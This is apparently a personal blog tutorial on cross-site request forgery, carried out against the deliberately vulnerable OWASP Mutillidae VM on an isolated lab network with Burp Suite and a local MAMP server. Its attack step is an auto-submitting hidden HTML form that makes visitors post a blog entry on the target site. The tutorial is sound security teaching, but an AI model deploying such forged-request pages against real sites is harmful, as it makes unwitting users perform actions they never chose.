PoC || GTFO

Hacking Tutorials

(CSRF) Cross-Site Request Forgery

dollars.png

I've been playing around with Web Application Security and wanted to do a writeup on CSRF (pronounced C-SURF). For those of you who are unfamiliar with CSRF, it's the action of sending a POST form to a hacker's specified target site, by having the victim go to a site with your CSRF code on it. That probably sounded more complicated than it really is. Here are the general steps:

  1. Research the target site and see what params are in the Body.
  2. Write a <form> that has all the necessary params and values your want to submit.
  3. Place the code on a website your victim will go to.
  4. After they visit the site, they will submit the form.
  5. Profit.

Prerequisites: This tutorial will go over the most basic usage of Burp Suite. If you never used Burp Suite before, this tutorial is for you! You should have some knowledge of how to setup a VM. I won't be going over that, and assume you can setup OWASP Broken WebApp's VM, and get to it via a browser. Same with MAMP.

Tools Used:
Firefox - A browser > Internet Explorer
Burp Suite - Setup local proxy to intercept browser traffic
MAMP (macOS, Apache, MySQL, PHP) - Launches a local Web Server (There's also WAMP for Windows and LAMP for GNU Linux)
OWASP Broken Web Applications - A very vulnerable Web Server for learning
Virtualbox - Virtualize the OWASP VM
Visual Code Studio (any IDE or text editor will work)


Network Configuration


Here is how our network is configure.

  • 192.168.56.101 - OWASP VM
  • 192.168.56.1 - Virtual Router and MAMP Server
download-1.png

Yours might look different. The only nesessary thing, is that both web servers can talk to each other.


Burp Suite Setup


 Click  Next

Click Next

 Click  Proxy  &gt;&nbsp; Options .

Click Proxy Options.

 Make sure your proxy is  checked . Nicely done!

Make sure your proxy is checked. Nicely done!


Firefox Settings: Proxy


 Go to  Advanced &gt; Network &gt; Settings...

Go to Advanced > Network > Settings...


 Set to Manual, 127.0.0.1 and port 8080.

Set to Manual, 127.0.0.1 and port 8080.


Perfect. Now, given that the both your MAMP and OWASP VM are running AND able to connect to one another, let's continue to gather information about the form. (I should warn, NEVER connect vulnerable VM boxes directly to the internet. The best configuration is to setup your Host OS (in this case, my Mac), and your Guest OS (the OWASP VM) on a virtual network. In Virutalbox, you can do this by clicking Settings > Network and set the NIC to attach Host-only Adapter

 If you want multiple VMs to talk with one another, you can simply put them on the same Host-only Adapter network. This is usually preferable as to isolate VMs from the actual internet.

If you want multiple VMs to talk with one another, you can simply put them on the same Host-only Adapter network. This is usually preferable as to isolate VMs from the actual internet.


Great! Now let's navigate to the CSRF portion of this VM. 


Screen Shot 2017-11-14 at 1.24.29 PM.png

When your server is launched, you should see this page by putting its IP in your browser. We will be going through the Mutillidae II tutorial so click the button!

...but wait. Somethings wrong. It didn't take us to the next page. It's taking forever and just hanging. This is because the request is hanging out in our Burp Suite Proxy! Let's take a look.

 As you can see here, we have our request here.

As you can see here, we have our request here.

By clicking the Forward button, the request is sent to the server and we can continue.

Screen Shot 2017-11-14 at 2.46.08 PM.png

Now we will navigate to the CSRF page.
OWASP 2013 > A8 Cross-Site Request Forgery (CSRF) > Add to your blog
Don't forget to forward your request in your Burp Suite!

The next page will have blog posts of user "anonymous". This means the website allows for anyone to post blogs. Let's exploit the ability to post blogs via CSRF.

Screen Shot 2017-11-14 at 2.51.12 PM.png

Now's the fun part! Let's post something as anon, and review the request. Cardi B lyrics seems appropriate as of Nov 14th, 2017. I'm sure this won't date well, but whatever. =]
Once we input our lyrics and click Save Blog Entry, we head over to our Burp Suite to see it catch the POST

 The bottom section is what we want. It's the params for the body. If you click  Params  on the top, you'll see what I mean.

The bottom section is what we want. It's the params for the body. If you click Params on the top, you'll see what I mean.

 These are the Parameters for the request. As you can see, we have 1  URL , 4  Cookie, &nbsp;and 3  Body &nbsp;params.  We want the Body Params.

These are the Parameters for the request. As you can see, we have 1 URL, 4 Cookie, and 3 Body params. We want the Body Params.


 There is our post.

There is our post.


What we want to do here is gather all the information for the Body Params. In our case, it is the following:

  • csrf-token = NULL
  • blog_entry = "My pussy glitter as gold"
  • add-to-your-blog-php-submit-button = "Save Blog Entry"

Awesome! Along with the website's url, we now have all the information we need. Muahaha. Time to head over to our MAMP webserver and place a file in there.


 Ima Basic Bitch.

Ima Basic Bitch.


Your front page will probably look different. I just change my index.html file and put this there. We will now be creating the website that will force any user who visits the page to submit a blog post to the OWASP website. Programming time!

What we're going to want to do, is create a <form> with all the body params, and then create a <script> that submits the form.

Here, we need to supply the address of the website we want to POST to in the action for the form. Thereafter, we simply put the name and associated values for our form. 


<!-- Form Post -->
        <form name="csrf" action="https://192.168.56.101/mutillidae/index.php?page=add-to-your-blog.php"
        method="POST">
        <input type="hidden" name='csrf-token' value=''>
        <input type="hidden" name='blog_entry' value='This entry was totally hacked!'>
        <input type="hidden" name='add-to-your-blog-php-submit-button' value='Save Blog Entry'>
    
    </form>

Nice! The next step, is to add the JavaScript that will submit the form. Nothing too crazy. 


<script>document.csrf.submit();</script>

Sweet! Now just for some fun, I added a photo and a few words into the file I created, named blog.html. Here is the code on the bottom.


<html>
    <center>
    <body><h1>Welcome to My Website!</h1>
        If you're reading this, you probably have been hacked.<br><br>
        <img src="http://weknowmemes.com/wp-content/uploads/2011/11/free-shrugs.jpg"></body><br>
        Sorry, not sorry.<br>

        <!-- Form Post -->
        <form name="csrf" action="https://192.168.56.101/mutillidae/index.php?page=add-to-your-blog.php"
        method="POST">
        <input type="hidden" name='csrf-token' value=''>
        <input type="hidden" name='blog_entry' value='This entry was totally hacked!'>
        <input type="hidden" name='add-to-your-blog-php-submit-button' value='Save Blog Entry'>
    
    </form>
    <script>document.csrf.submit();</script>
        <!-- End Form Post -->
    </center></body>
</html>

Let's go visit the website, and see what happens on OWASPs side! BUT BEFORE, flip off the Intercept button on your Burp Suite Proxy. Makes things go smoother.


Success! We successfully made the visitor to my MAMP website, submit a form to the OWASP website!

Cons: One of the issues is that it redirects the submitted website. I attempted something like <script>window.location.replace("http://stackoverflow.com");</script>
But it didn't seem to work. Maybe there's a way to submit a request, but also have the site send you back to the form site? But then there'd be a loop...Any insight on this would be appreciated!


Chris Magistrado